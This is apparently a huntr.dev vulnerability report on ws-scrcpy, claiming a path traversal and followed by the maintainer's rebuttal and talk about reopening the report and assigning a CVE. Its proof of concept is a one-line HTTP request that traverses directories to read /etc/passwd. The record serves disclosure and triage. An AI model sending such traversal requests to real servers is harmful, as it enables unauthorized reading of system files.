External Control of File Name or Path in netristv/ws-scrcpy
Reported on
Dec 13th 2021
Description
read file From server
Proof of Concept
GET /../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xxxx
Impact
test on ws-scrcpy-0.7οΌthis is The latest version
SECURITY.md
2 years ago
@whoamisky Thank you for the report.
This method is only used to read the configuration file.
User (admin/service owner) should pass path to the file in WS_SCRCPY_CONFIG environment variable.
The content of the file is not avalivale to end users over HTTP.
See comment.
@admin Can we please reopen this report and change its status?
@drauggres - sure, we can arrange that for you!
Would you like me to change it back to pending so that you can re-mark it as valid?
Yes please.
P.S. [Not related to this report] The link from email notification brought me to www.huntr.dev and I am not authorized there, but I still have the active session on huntr.dev (maybe you have some problem with cookie)
Will get this sorted for you now!
With regards to the cookie issue, I have created a bug ticket internally, and we will investigate the problem shortly! Thank you for letting us know β₯οΈ
For reference, I have now set the report back to pending as requested by @drauggres.
Thanks! π
Before we assign a CVE, we just need to get confirmation from the maintainer that they are happy for us to create one (require maintainer confirmation when our system doesn't automatically assign and publish one).
@drauggres - are you happy for us to assign a CVE to this vulnerability report?